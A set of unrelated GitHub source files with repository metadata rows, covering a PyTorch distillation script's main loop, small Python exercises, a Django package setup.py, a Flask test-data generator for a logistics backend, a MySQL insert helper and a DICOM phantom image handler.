    # that were never moved — confirm device placement on those paths.
    if args.local_rank != -1:
        teacher_model = nn.parallel.DistributedDataParallel(
            teacher_model, device_ids=[args.local_rank],
            output_device=args.local_rank, find_unused_parameters=True)
        student_model = nn.parallel.DistributedDataParallel(
            student_model, device_ids=[args.local_rank],
            output_device=args.local_rank, find_unused_parameters=True)

    if args.finetune:
        del t_scaler, t_scheduler, t_optimizer, teacher_model, unlabeled_loader
        del s_scaler, s_scheduler, s_optimizer
        finetune(args, finetune_dataset, test_loader, student_model, criterion)
        return

    if args.evaluate:
        del t_scaler, t_scheduler, t_optimizer, teacher_model, unlabeled_loader, labeled_loader
        del s_scaler, s_scheduler, s_optimizer
        evaluate(args, test_loader, student_model, criterion)
        return

    teacher_model = teacher_model.to(args.device)
    student_model = student_model.to(args.device)
    teacher_model.zero_grad()
    student_model.zero_grad()
    train_loop(args, labeled_loader, unlabeled_loader, test_loader, finetune_dataset,
               teacher_model, student_model, avg_student_model, criterion,
               t_optimizer, s_optimizer, t_scheduler, s_scheduler, t_scaler, s_scaler)
    return
# Script entry point.
if __name__ == '__main__':
    main()
| wonyangcho/2023bigdataproject | src/main copy.py | main copy.py | py | 30,511 | python | en | code | 0 | github-code | 90 |
75118464296 | #!/usr/bin/python3
"""Module that contains function that loads, add and also save json to file"""
import sys
save = __import__("5-save_to_json_file").save_to_json_file
load = __import__("6-load_from_json_file").load_from_json_file
filename = "add_item.json"
def main(filename):
    """Loads json, Add json to file, saves

    Args:
        filename: the filename
    """
    # Every command-line argument after the script name is a new item.
    new_items = list(sys.argv[1:])
    try:
        # Prepend whatever the file already holds, then persist the union.
        existing = load(filename)
        save(list(existing) + new_items, filename)
    except FileNotFoundError:
        # First run: nothing to merge, just save the new items.
        save(new_items, filename)
main(filename)
| wiseman-umanah/alx-higher_level_programming | 0x0B-python-input_output/7-add_item.py | 7-add_item.py | py | 657 | python | en | code | 0 | github-code | 90 |
33663463982 | #!/usr/bin/env python
#:coding=utf-8:
from setuptools import setup, find_packages
import sys
extra = {}
# NOTE(review): use_2to3 was removed in setuptools 58 (2021); installing with
# a modern setuptools will fail — confirm the supported toolchain.
if sys.version_info >= (3,):
    extra['use_2to3'] = True

# Standard setuptools metadata for the bpssl package.
setup(
    name='bpssl',
    version='1.0.3',
    description='SSL/HTTPS for Django',
    # README plus changelog form the PyPI long description.
    long_description=open('README.rst').read() + '\n' + open('CHANGES.rst').read(),
    author='Ian Lewis',
    author_email='ian@beproud.jp',
    url='http://bitbucket.org/beproud/bpssl/',
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Framework :: Django',
        'Environment :: Plugins',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
    packages=find_packages(),
    # Legacy setuptools namespace packages.
    namespace_packages=[
        'beproud',
        'beproud.django',
    ],
    install_requires=[
        'Django>=1.2',
    ],
    test_suite='tests.main',
    **extra
)
| beproud/bpssl | setup.py | setup.py | py | 1,131 | python | en | code | 0 | github-code | 90 |
# Count how many messages each sender contributed to an mbox file and print
# the busiest sender.  "From " lines look like:
#   From stephen.marquard@uct.ac.za Sat Jan  5 09:14:16 2008
name = input("Enter file:")
if len(name) < 1:
    name = "mbox-short.txt"

book = dict()
# BUG FIX: the file was never closed; the with-block guarantees cleanup.
with open(name) as text:
    for line in text:
        if not line.startswith("From "):
            continue
        # split() already discards the trailing newline, so the original
        # no-op `line.rstrip()` (its result was thrown away) is removed.
        words = line.split()
        book[words[1]] = book.get(words[1], 0) + 1

# Rank (count, address) pairs so the busiest sender sorts first; reverse
# sort preserves the original tie-breaking on address.
val_order = sorted(((v, k) for k, v in book.items()), reverse=True)
print(val_order[0][0], val_order[0][1])
| dzpiers/Python-For-Everybody | chapter_10-1.py | chapter_10-1.py | py | 410 | python | en | code | 0 | github-code | 90 |
9075142388 | from datetime import datetime
from flask import Flask, render_template, request
from loguru import logger
from api import backend_methods as task
from utils.other_funcs import date_now, sleep_timer
# create the Flask app
app = Flask(__name__)
# BUG FIX: app.route must be outermost so Flask registers the
# logger.catch-wrapped view; with logger.catch on top it never ran.
@app.route('/')
@logger.catch
def index():
    """Render the landing page."""
    return render_template('index.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_tasks_first_service')
@logger.catch
def first_service_create_tasks_sock():
    """Render the task-creation page for the first service."""
    return render_template('first_service_create_tasks.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_tasks_second_service')
@logger.catch
def second_service_create_tasks_sock():
    """Render the task-creation page for the second service."""
    return render_template('second_service_create_tasks.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_tasks_third_service')
@logger.catch
def third_service_create_tasks_sock():
    """Render the task-creation page for the third service."""
    return render_template('third_service_create_tasks.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_tasks_forth_service')
@logger.catch
def forth_service_create_tasks_sock():
    """Render the task-creation page for the fourth service."""
    return render_template('forth_service_create_tasks.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_barcode')
@logger.catch
def carriage_barcode_sock():
    """Render the barcode-creation page."""
    return render_template('create_barcode.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/load_route_list')
@logger.catch
def load_route_list_sock():
    """Render the route-list loading page."""
    return render_template('load_route_list.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/update_priority_attribute')
@logger.catch
def update_priority_attribute_sock():
    """Render the priority-attributes update page."""
    return render_template('priority_attributes.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
# NOTE(review): '/add_other_priority' is also registered for the
# add_other_priority() handler further down; only the first-matching rule
# is dispatched, so one of the two handlers is unreachable — confirm.
@app.route('/add_other_priority')
@logger.catch
def route_article_attribute_add():
    """Render the other-attributes page."""
    return render_template('other_attributes.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/receipt_creating')
@logger.catch
def receipt_creating_rout():
    """Render the receipt-creation page."""
    return render_template('create_receipt.html')
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
@app.route('/create_route_lists')
@logger.catch
def create_route_lists():
    """Create a route list for the id given in the ``ids`` query parameter.

    Accepts either a bare id or a ``prefix-id`` value; only the part after
    the hyphen is forwarded to the backend.
    """
    _id = request.args.get('ids', '')
    if '-' in _id:
        _id = _id.split('-')[1]
    return task.load_route_list(_id)
# BUG FIX: app.route outermost so the logger.catch wrapper is registered.
# NOTE(review): this rule is also registered for route_article_attribute_add()
# above; only the first-matching registration is dispatched — confirm intent.
@app.route('/add_other_priority')
@logger.catch
def add_other_priority():
    """Attach the selected priority attributes to the given boxes.

    Query parameters: ``box_ids`` (comma-separated) and five boolean flags
    ``Type 1`` .. ``Type 5`` (the string 'true' enables a flag).  Returns
    the backend response, or a 400 when no box id or no flag is supplied.
    """
    # BUG FIX: ''.split(',') yields [''] so the original len() > 0 check
    # always passed; filter out empty ids to make the check meaningful.
    box_ids = [b for b in request.args.get('box_ids', '').split(',') if b]
    attrs = {
        "Type 1": request.args.get('Type 1'),
        "Type 2": request.args.get('Type 2'),
        "Type 3": request.args.get('Type 3'),
        "Type 4": request.args.get('Type 4'),
        "Type 5": request.args.get('Type 5')
    }
    # A flag counts as enabled only when the client sent the string 'true'.
    attributes = [value == 'true' for value in attrs.values()]
    if box_ids and any(attributes):
        return task.add_other_priority(box_ids, attrs)
    else:
        return (
            f"Wrong format type box_ids={request.args.get('box_ids', '')}, "
            f"attrs={attrs}",
            400
        )
@logger.catch
@app.route('/create_tasks_first_service')
def update_first_service_create_tasks():
    """Create first-service boxes, move them, route them and give them out.

    Returns {"boxes_id": "<comma separated ids>"} on success.
    NOTE(review): '/create_tasks_first_service' is also mapped to
    first_service_create_tasks_sock above — confirm the intended handler.
    """
    date_time = date_now()
    client_id = request.args.get('client_id', "")
    local_warehouse_id = request.args.get('local_warehouse_id', "")
    type_id = request.args.get('type_id', "")
    client_name = request.args.get('client_name', "")
    longitude = request.args.get('longitude', "")
    latitude = request.args.get('latitude', "")
    address = request.args.get('address', "")
    # int("") raises ValueError when 'boxes_count' is absent; @logger.catch
    # only logs it, so the client would see a 500 — confirm intended.
    boxes_count = int(request.args.get('boxes_count', ""))
    if client_id == "":
        return "Enter the client_id", 400
    # 1) Create the boxes in the backend service.
    boxes = task.update_first_service_create_tasks(
        boxes_count=boxes_count,
        local_warehouse_id=int(local_warehouse_id),
        delivery_variant_id=int(type_id),
        client_name=client_name,
        latitude=latitude,
        longitude=longitude,
        address=address
    )
    boxes_list = boxes["boxes"]
    # sleep_timer calls pace the backend between dependent operations.
    sleep_timer(2)
    # 2) Move the freshly created boxes to the local warehouse.
    moving_boxes = task.change_status_for_boxes(boxes_list, local_warehouse_id)
    sleep_timer(2)
    # 3) Build a route list for the client from those boxes.
    route_list = task.create_route_lists(
        client_id,
        boxes_list,
        date_time,
        local_warehouse_id
    )
    if route_list["status"] != 201:
        return f"{route_list}", 400
    sleep_timer(7)
    # 4) Give the route list out; on failure return all intermediate responses.
    give_out = task.short_giveout_route_lists(
        boxes_list, route_list["RouteListId"],
        local_warehouse_id
    )
    if give_out["status"] != 200:
        return {
            "responses": {
                "boxes": boxes,
                "moving_boxes": moving_boxes,
                "route_list": route_list
            },
            "give_out": give_out
        }, 400
    logger.debug({
        "responses": {
            "boxes": boxes,
            "moving_boxes": moving_boxes,
            "route_list": route_list,
            "give_out": give_out
        }
    })
    return {
        "boxes_id": ', '.join(str(x) for x in boxes_list)
    }
@logger.catch
@app.route('/create_tasks_second_service')
def create_tasks_second_service():
    """Create second-service boxes one by one, route them and give them out.

    Returns {"box_id": [<ids>]} on success.
    NOTE(review): '/create_tasks_second_service' is also mapped to
    second_service_create_tasks_sock above — confirm the intended handler.
    """
    date_time = date_now()
    boxes_list = []
    client = request.args.get('client', '')
    local_warehouse_id = request.args.get('local_warehouse_id', '')
    payment_type = request.args.get('payment_type', '')
    type_id = request.args.get('type_id', '')
    boxes_count = int(request.args.get('boxes_count', ''))
    if client == "":
        return "Enter the client_id", 400
    # Resolve the available time slots for this delivery type.
    timeslot_response = task.get_time_ranges(
        type_id=int(type_id)
    )
    timeslot = timeslot_response["timeSlots"]
    logger.debug(
        f"{client}, "
        f"{local_warehouse_id}, "
        f"{type_id}, "
        f"{boxes_count}, "
        f"{timeslot}"
    )
    create_tasks_second_service_responses = []
    moving_boxes_responses = []
    # Create each box, then immediately move it to the local warehouse.
    for _ in range(boxes_count):
        box = task.create_tasks_second_service(
            type_id=type_id, timeslot_id=timeslot,
            payment_type=payment_type
        )
        if box["status"] != 201:
            return f"{box}", 400
        sleep_timer(2)
        create_tasks_second_service_responses.append(box)
        moving_boxes_responses.append(
            task.change_status_for_box(str(box["boxId"]), int(local_warehouse_id))
        )
        boxes_list.append(str(box["boxId"]))
    sleep_timer(3)
    # Build one route list from all created boxes, then give it out.
    route_list = task.create_route_lists(
        client, boxes_list, date_time, local_warehouse_id
    )
    sleep_timer(5)
    give_out = task.short_giveout_route_lists(
        boxes_list, route_list["RouteListId"],
        local_warehouse_id
    )
    if give_out["status"] != 200:
        return {
            "responses": {
                "timeslot": timeslot_response,
                "create_tasks_second_service": create_tasks_second_service_responses,
                "moving_boxes": moving_boxes_responses,
                "route_list": route_list
            },
            "give_out": give_out
        }, 400
    logger.debug({
        "responses": {
            "timeslot": timeslot_response,
            "create_tasks_second_service": create_tasks_second_service_responses,
            "moving_boxes": moving_boxes_responses,
            "route_list": route_list,
            "give_out": give_out
        }
    })
    return {
        "box_id": boxes_list
    }
@logger.catch
@app.route('/create_barcode')
def create_barcode():
    """Create a special box (pallet), optionally fill it with cartoons and/or
    boxes, approve it into the warehouse and return its printable barcode.

    Query params (all required ints): count (cartoons), boxes_count,
    route_id, local_warehouse_id, type_id.
    """
    # Local fallbacks instead of the previous ``global`` statement: with both
    # counts at zero the original read never-assigned globals and raised
    # NameError inside the final logging call on a fresh process.
    boxes = None
    boxes_response = None
    add_boxes_to_special_boxes = None
    special_box = None
    append_boxes_to_special_boxes = None
    cartoons_count = int(request.args.get('count', ''))
    boxes_count = int(request.args.get('boxes_count', ''))
    route_id = int(request.args.get('route_id', ''))
    local_warehouse_id = int(request.args.get('local_warehouse_id', ''))
    type_id = int(request.args.get('type_id', ''))
    # Must be a list: the original tuple ``()`` has no .append() and crashed
    # as soon as cartoons_count > 0.
    boxes_name = []
    date_time = datetime.now()
    date_time = date_time.strftime("%Y-%m-%dT00:00:00")
    new_special_box = task.create_special_boxes(route_id, date_time)
    if new_special_box["status"] == 201:
        new_special_box = new_special_box["special_box"]
    else:
        return f"{new_special_box}", 400
    if cartoons_count > 0:
        sleep_timer(2)
        boxes = task.create_tasks_third_service(
            box_count=cartoons_count, local_warehouse_id=local_warehouse_id,
            type_id=type_id
        )
        boxes_response = []
        for box in boxes["box"]:
            special_box = task.create_pallets(new_special_box)
            if special_box["status"] != 200:
                return f"{special_box}", 400
            box_name = task.get_boxes_name(box)
            if box_name["status"] == 200:
                box_name = box_name["names"]
            else:
                # NOTE(review): this reports special_box rather than the
                # failed box_name lookup — confirm which response belongs here.
                return f"{special_box}", 400
            boxes_response.append([special_box, box_name])
            boxes_name.append(box_name['box']['name'])
        logger.debug(boxes_name)
        sleep_timer(6)
        add_boxes_to_special_boxes = task.add_boxes_to_special_boxes(
            new_special_box,
            boxes_name
        )
    if boxes_count > 0:
        special_box = task.create_tasks_third_service(
            boxes_count=boxes_count, local_warehouse_id=local_warehouse_id,
            type_id=type_id
        )
        sleep_timer(2)
        append_boxes_to_special_boxes = task.get_boxes_within_special_boxes(
            special_box["box"], new_special_box
        )
    sleep_timer(3)
    approve_special_box = task.approve_special_boxes_into_warehouse(new_special_box)
    # Printable barcode: "%1%" prefix + first 12 characters of the box id.
    new_special_box = f"%1%{str(new_special_box)[:12]}"
    logger.debug({
        "barcode": new_special_box,
        "responses": {
            "new_special_box": new_special_box,
            "boxes": boxes or "",
            "boxes_response": boxes_response or "",
            "add_boxes_to_special_boxes": add_boxes_to_special_boxes or "",
            "special_box": special_box or "",
            "append_boxes_to_special_boxes": append_boxes_to_special_boxes or "",
            "approve_special_box": approve_special_box,
        }
    })
    return new_special_box
@logger.catch
@app.route('/forth_service_create_tasks')
def create_tasks_forth_service():
    """Create forth-service boxes, pack them onto a pallet, route and give out.

    NOTE(review): a second view with this same function name and route is
    defined further down in this file; registering a second view under an
    existing Flask endpoint name raises AssertionError at import time, so one
    of the two definitions must be removed or renamed — confirm which.
    """
    global append_boxes
    date_time = date_now()
    cartoons_list = []
    client_id = request.args.get('client_id', '')
    local_warehouse_id = request.args.get('local_warehouse_id', '')
    type_id = request.args.get('type_id', '')
    warehouse_place_id = int(request.args.get('warehouse_place_id', ''))
    boxes_count = int(request.args.get('box_count', ""))
    if client_id == "":
        return "Enter the client id", 400
    # 1) Create the boxes.
    box = task.create_tasks_forth_service(
        boxes_count=boxes_count,
        local_warehouse_id=int(local_warehouse_id),
        type_id=int(type_id),
    )
    if box["status"] != 201:
        return f"{box}", 400
    boxes_list = box["box"]
    logger.debug(boxes_list)
    sleep_timer(2)
    # 2) Create a pallet (special box) at the given warehouse place.
    article_boxes = task.create_pallets_boxes(local_warehouse_id, warehouse_place_id)
    if article_boxes["status"] != 201:
        return f"{article_boxes}", 400
    sleep_timer(2)
    # 3) Attach every created box to the pallet.
    for box in boxes_list:
        append_boxes = task.append_boxes_to_special_boxes(
            box, article_boxes["article_boxes"]
        )
        if append_boxes["status"] != 201:
            return f"{append_boxes}", 400
        sleep_timer(2)
    articles_state = task.change_special_boxes_state(article_boxes["article_boxes"])
    sleep_timer(2)
    moving_boxes_response = task.change_status_for_box(
        article_boxes["article_boxes"],
        int(local_warehouse_id)
    )
    if articles_state["status"] != 200:
        return f"{article_boxes}", 400
    logger.debug(request.args.get('add_boxes'))
    logger.debug(request.args.get('add_boxes') == "true")
    boxes_response = []
    # NOTE(review): this rebinding discards the change_status_for_box result
    # captured just above before it reaches the final debug log — confirm.
    moving_boxes_response = []
    if request.args.get('add_boxes') == "true":
        # Optionally create one extra box and move it as well.
        box = task.create_tasks_forth_service(
            boxes_count=1, local_warehouse_id=int(local_warehouse_id),
            type_id=int(type_id)
        )
        if box["status"] != 201:
            return f"{box}", 400
        sleep_timer(2)
        boxes_response.append(box)
        moving_boxes_response.append(
            task.change_status_for_box(
                str(box["box"][0]), int(local_warehouse_id)
            )
        )
        cartoons_list.append(str(box["cartoon"][0]))
        boxes_list.append(str(box["box"][0]))
    sleep_timer(5)
    # 4) Route everything and give it out.
    route_list = task.create_route_lists(
        client_id, boxes_list, date_time, local_warehouse_id
    )
    if route_list["status"] != 201:
        return f"{route_list}", 400
    sleep_timer(5)
    cartoons_list.append(str(article_boxes["article_boxes"]))
    give_out = task.short_giveout_route_lists(
        cartoons_list, route_list["RouteListId"],
        local_warehouse_id
    )
    if give_out["status"] != 200:
        return f"{give_out}", 400
    logger.debug({
        "responses": {
            "box": box,
            "article_boxes": article_boxes,
            "append_boxes": append_boxes,
            "articles_state": articles_state,
            "moving_boxes_response": moving_boxes_response,
            "boxes_response": boxes_response,
            "route_list": route_list,
            "give_out": give_out
        }
    })
    return {
        "box_id": boxes_list
    }
@logger.catch
@app.route('/update_priority_attribute')
def update_priority_attribute():
    """Resolve a box id to its name and update its priority attribute."""
    box_identifier = request.args.get('box_id', '')
    if not box_identifier:
        return "Enter box id", 400
    priority = request.args.get('priority', '')
    name_payload = task.get_boxes_name(box_identifier)
    box_name = name_payload["names"]['box']['name']
    return task.update_priority_attribute(box_name, priority)
@logger.catch
@app.route('/forth_service_create_tasks')
def create_tasks_forth_service_legacy():
    """Older variant of the forth-service flow (no give-out step).

    Renamed: the original reused the name ``create_tasks_forth_service``, and
    registering a second view under an already-registered Flask endpoint name
    raises AssertionError at import time, so the whole app failed to start.
    With a distinct endpoint name both definitions can coexist; the first one
    registered serves '/forth_service_create_tasks'.
    """
    global append_postings
    date_time = date_now()
    cartoon_list = []
    client_id = request.args.get('client_id', '')
    local_warehouse_id = request.args.get('local_warehouse_id', '')
    type_id = request.args.get('type_id', '')
    warehouse_place_id = int(request.args.get('warehouse_place_id', ''))
    box_count = int(request.args.get('box_count', ""))
    if client_id == "":
        return "Enter the client id", 400
    # 1) Create the boxes.
    box_id = task.create_tasks_forth_service(
        boxes_count=box_count,
        local_warehouse_id=int(local_warehouse_id),
        type_id=int(type_id),
    )
    if box_id["status"] != 201:
        return f"{box_id}", 400
    boxes_list = box_id["box_id"]
    logger.debug(boxes_list)
    # 2) Create a pallet and attach every box to it.
    article_boxes = task.create_pallets_boxes(local_warehouse_id, warehouse_place_id)
    if article_boxes["status"] != 201:
        return f"{article_boxes}", 400
    sleep_timer(2)
    for box_id in boxes_list:
        append_postings = task.append_boxes_to_special_boxes(
            box_id, article_boxes["article_boxes"]
        )
        if append_postings["status"] != 201:
            return f"{append_postings}", 400
        sleep_timer(2)
    articles_state = task.change_special_boxes_state(article_boxes["article_boxes"])
    sleep_timer(2)
    moving_box_response = task.change_status_for_box(
        article_boxes["article_boxes"],
        int(local_warehouse_id)
    )
    if articles_state["status"] != 200:
        return f"{article_boxes}", 400
    logger.debug(request.args.get('add_box'))
    logger.debug(request.args.get('add_box') == "true")
    boxes_response = []
    moving_boxes_response = []
    if request.args.get('add_box') == "true":
        # Optionally create and move one extra box.
        box_id = task.create_tasks_forth_service(
            boxes_count=1, local_warehouse_id=int(local_warehouse_id),
            type_id=int(type_id)
        )
        if box_id["status"] != 201:
            return f"{box_id}", 400
        sleep_timer(2)
        boxes_response.append(box_id)
        moving_boxes_response.append(
            task.change_status_for_box(
                str(box_id["box_id"][0]), int(local_warehouse_id)
            )
        )
        cartoon_list.append(str(box_id["box_id"][0]))
        boxes_list.append(box_id["box_id"][0])
    sleep_timer(3)
    # 3) Route the boxes and return the loaded route list.
    route_list = task.create_route_lists(
        client_id, boxes_list, date_time, local_warehouse_id
    )
    if route_list["status"] != 201:
        return f"{route_list}", 400
    sleep_timer(3)
    cartoon_list.append(str(article_boxes["article_boxes"]))
    logger.debug({
        "responses": {
            "box_id": box_id,
            "article_boxes": article_boxes,
            "append_postings": append_postings,
            "articles_state": articles_state,
            "moving_box_response": moving_box_response,
            "boxes_response": boxes_response,
            "moving_boxes_response": moving_boxes_response,
            "route_list": route_list
        }
    })
    return {
        "Result": task.load_route_list(route_list["RouteListId"]),
        "Boxes list": boxes_list
    }
@logger.catch
@app.route('/receipt_creating')
def receipt_creating():
    """Create a receipt from query parameters; 400 on any missing required field."""
    # All parameters, in the positional order task.receipt_creating expects.
    field_names = (
        'payment_id', 'receipt_id', 'created_date', 'updated_date',
        'done_date', 'salary_type', 'payment_body', 'receipt_link',
        'cancellation_date',
    )
    values = {name: request.args.get(name, '') for name in field_names}
    # Required fields and their exact error messages, checked in order.
    required = (
        ('payment_id', "Enter PaymentID"),
        ('receipt_id', "Enter ReceiptID"),
        ('created_date', "Enter created_date"),
        ('updated_date', "Enter updated_date"),
        ('done_date', "Enter done_date"),
        ('salary_type', "Enter salary_type"),
        ('payment_body', "Enter payment_body"),
    )
    for name, message in required:
        if not values[name]:
            return message, 400
    return task.receipt_creating(*(values[name] for name in field_names))
if __name__ == '__main__':
    # Run the Flask dev server in debug mode on port 8888
    # (the previous comment claimed port 5000, which was wrong).
    # NOTE(review): host='1.1.1.1' is not a bindable local address on typical
    # machines — confirm; '0.0.0.0' is the usual "all interfaces" value.
    app.run(debug=True, port=8888, host='1.1.1.1')
| AgrobnarV/GenerateTestDataPortal_update | flask_app.py | flask_app.py | py | 17,818 | python | en | code | 0 | github-code | 90 |
26037666448 | import logging
import os
import stat
import zc.buildout
from zc.recipe.egg.egg import Eggs
WSGI_TEMPLATE = """\
import sys
sys.path[0:0] = [
%(syspath)s,
]
from pyramid.paster import get_app, setup_logging
configfile = "%(configfile)s"
setup_logging(configfile)
application = get_app(configfile, name=%(app_name)s)
"""
class Recipe:
    """zc.buildout recipe that generates a Pyramid WSGI launcher script.

    Options:
        config-file: path to the Pyramid/paste .ini file (required).
        target: explicit output path for the script (optional; defaults to
            <parts-directory>/<part-name>/wsgi).
        extra-paths: extra sys.path entries for the generated script.
        app_name: named application/pipeline to load from the config, or
            unset to load the default one.
    """

    def __init__(self, buildout, name, options):
        self.buildout = buildout
        self.name = name
        self.options = options
        self.logger = logging.getLogger(self.name)
        if "config-file" not in options:
            self.logger.error(
                "You need to specify either a paste configuration file")
            raise zc.buildout.UserError("No paste configuration given")
        if "target" in options:
            # The target's parent directory must already exist.
            location = os.path.dirname(options["target"])
            if not os.path.isdir(location):
                self.logger.error(
                    "The 'target' option refers to a directory that is not "
                    "valid: %s" % location)
                raise zc.buildout.UserError("Invalid directory for target")

    def install(self):
        """Write the WSGI script, mark it executable and return created paths."""
        egg = Eggs(self.buildout, self.options["recipe"], self.options)
        reqs, ws = egg.working_set()
        path = [pkg.location for pkg in ws]
        extra_paths = self.options.get('extra-paths', '')
        extra_paths = extra_paths.split()
        path.extend(extra_paths)
        # Do not put None into 'quotes'
        # Everything else should be a string pointing to a pipeline
        app_name = self.options.get('app_name')
        if app_name is not None:
            app_name = '"%s"' % app_name
        output = WSGI_TEMPLATE % dict(
            configfile=self.options["config-file"],
            syspath=",\n    ".join((repr(p) for p in path)),
            app_name=app_name
        )
        target = self.options.get("target")
        if target is None:
            location = os.path.join(
                self.buildout["buildout"]["parts-directory"],
                self.name)
            if not os.path.exists(location):
                os.mkdir(location)
                self.options.created(location)
            target = os.path.join(location, "wsgi")
        else:
            self.options.created(target)
        # Context manager: the original leaked the file handle when the
        # write raised.
        with open(target, "wt") as f:
            f.write(output)
        exec_mask = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
        os.chmod(target, os.stat(target).st_mode | exec_mask)
        self.options.created(target)
        return self.options.created()

    def update(self):
        self.install()
| garbas/pyramid_recipe_modwgi | pyramid_recipe_modwsgi/__init__.py | __init__.py | py | 2,639 | python | en | code | 0 | github-code | 90 |
26010900944 | #!/usr/bin/env python3
import MySQLdb
def insert_into_table(table_name, data):
    """Insert ``data`` (column -> value mapping) as one row into ``table_name``.

    Returns a dict with a 'message' key on success or an 'error' key on
    failure. The connection is always closed.
    """
    db = MySQLdb.connect(host="localhost", user="electros", passwd="electros", db="siigo")
    cursor = db.cursor()
    try:
        # Bind the values as parameters instead of concatenating them into the
        # SQL string (the original was injectable through ``data`` values).
        # Table/column identifiers cannot be bound, so they are still
        # interpolated — callers must not pass untrusted names here.
        columns = ", ".join(data.keys())
        placeholders = ", ".join(["%s"] * len(data))
        query = "INSERT INTO " + table_name + "(" + columns + ") VALUES (" + placeholders + ") "
        cursor.execute(query, list(data.values()))
        db.commit()
        return {'message': "success creating {} on {}".format(data, table_name)}
    except MySQLdb.Error as exc:
        # Surface the real database error; the old bare ``except:`` always
        # reported 'Missing foreign key' no matter what went wrong.
        return {'error': str(exc)}
    finally:
        db.close()
| Jimmer942/Siigo_hackaton_2020 | metodos/crear.py | crear.py | py | 731 | python | en | code | 0 | github-code | 90 |
20769465466 | import logging
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from PIL import ImageFilter
from bat.DicomHandler import DicomHandler
class ImageHandler(DicomHandler):
    """
    Extends DicomHandler with display windowing, phantom-circle detection and
    circular integration over the CT image.
    """
    def __init__(self, filename):
        """
        Initialization function
        :param filename: input dicom file name including path
        """
        self.isImageComplete = False
        # self.RescaleType = {'linear', 'gamma'}
        try:
            # Let DicomHandler read the file first. Zero-argument super():
            # the old super(self.__class__, self) recurses forever if this
            # class is ever subclassed.
            super().__init__(filename)
        except Exception as e:
            logging.error(str(e))
        if not self.isComplete:
            logging.warning(r"Dicom class initialed failed. Procedure quited.")
            return
        try:
            # Convert raw pixel values to Hounsfield units.
            self.ImageHU = self.RawData * self.Slop + self.Intercept
            self.ImageRaw = self.ImageHU.copy()
            # First rescale so the image is displayable with a preset window.
            self.rescale_image((100, 0))
            # Center is always in format (row, col);
            # Radius is always in format (radius in pixel, diameter in mm).
            self.Center, self.Radius = self.calc_circle()
            # Result buffers for the circular integration. These were
            # previously commented out, which made save_image() and
            # show_integration_result() hit AttributeError whenever
            # integration() had not been run.
            self.Image_Integration_Result = np.zeros(self.Radius[0])
            self.Image_Median_Filter_Result = np.zeros(self.Radius[0])
            # Main calculation stays opt-in; call integration() explicitly.
            # self.integration()
        except Exception as e:
            logging.error(str(e))
            return
        # set the flag to indicate initializing done
        self.isImageComplete = True
        logging.info(r"Image initialed OK.")

    def rescale_image(self, window: tuple):
        """
        Rescale the image data into the 0~255 range and store it in
        self.ImageRaw (returns None).
        :param window: a tuple passed in as (window width, window center)
        """
        raw_data = self.ImageHU.copy()
        window_upper = window[1] + window[0] / 2
        window_lower = window[1] - window[0] / 2
        # Clamp to the window: everything above/below is saturated.
        upper_filter = raw_data > window_upper
        raw_data[upper_filter] = window_upper  # set upper value
        lower_filter = raw_data < window_lower
        raw_data[lower_filter] = window_lower  # set lower value
        # rescale the data to 0~255
        min_hu_image = raw_data.min()
        max_hu_image = raw_data.max()
        if min_hu_image == max_hu_image:
            # Flat image: avoid division by zero.
            self.ImageRaw = (raw_data - min_hu_image) * 255
        else:
            # rescale the image to fit 0~255
            self.ImageRaw = (raw_data - min_hu_image) * 255 / (max_hu_image - min_hu_image)

    def calc_circle(self):
        """
        Calculate the phantom center and radius.
        Scans from each image border toward the middle of the edge-filtered
        image; the first non-zero pixel marks the phantom boundary.
        :return: two tuples: (center row, center col) and
                 (radius in pixel, diameter in cm)
        """
        is_abnormal = False
        # NOTE(review): the column center is seeded/checked with Size[0] but
        # scanned over Size[1] (and vice versa for rows) — harmless for square
        # images; confirm for non-square ones.
        center_col = self.Size[0] // 2
        center_row = self.Size[1] // 2
        left_distance = 0
        right_distance = 0
        up_distance = 0
        low_distance = 0
        max_allowed_deviation = 20
        # Use PIL's edge filter and convert back to a numpy array;
        # this makes the boundary search more accurate.
        filtered_image = np.array(
            Image.fromarray(self.ImageRaw)
            .convert("L")
            .filter(ImageFilter.FIND_EDGES)
        )
        # start to calculate center col
        for left_distance in range(1, self.Size[1]):
            if filtered_image[center_row, left_distance] != 0:
                break
        for right_distance in range(1, self.Size[1]):
            if filtered_image[center_row, self.Size[1] - right_distance] != 0:
                break
        center_col += (left_distance - right_distance) // 2
        logging.debug(r"Center Col calculated as: " + str(center_col))
        # Reject the result if it drifted more than max_allowed_deviation
        # pixels from the geometric middle. (The original chained comparison
        # `(mid + 20) < x < (mid - 20)` had inverted bounds and was never true.)
        if not (self.Size[0] // 2 - max_allowed_deviation <
                center_col <
                self.Size[0] // 2 + max_allowed_deviation):
            logging.warning(r"It seems abnormal when calculate Center Col, use image center now!")
            center_col = self.Size[0] // 2
            is_abnormal = True
        # start to calculate center row
        for up_distance in range(1, self.Size[0]):
            if filtered_image[up_distance, center_col] != 0:
                break
        for low_distance in range(1, self.Size[0]):
            if filtered_image[self.Size[0] - low_distance, center_col] != 0:
                break
        center_row += (up_distance - low_distance) // 2
        logging.debug(r"Center Row calculated as: " + str(center_row))
        # Same deviation check for the row (bounds fixed as above).
        if not (self.Size[1] // 2 - max_allowed_deviation <
                center_row <
                self.Size[1] // 2 + max_allowed_deviation):
            logging.warning(r"It seems abnormal when calculate Center row, use image center now!")
            center_row = self.Size[1] // 2
            is_abnormal = True
        # set different radius according to normal/abnormal situation
        if is_abnormal is False:
            radius = (self.Size[0] - left_distance - right_distance) // 2
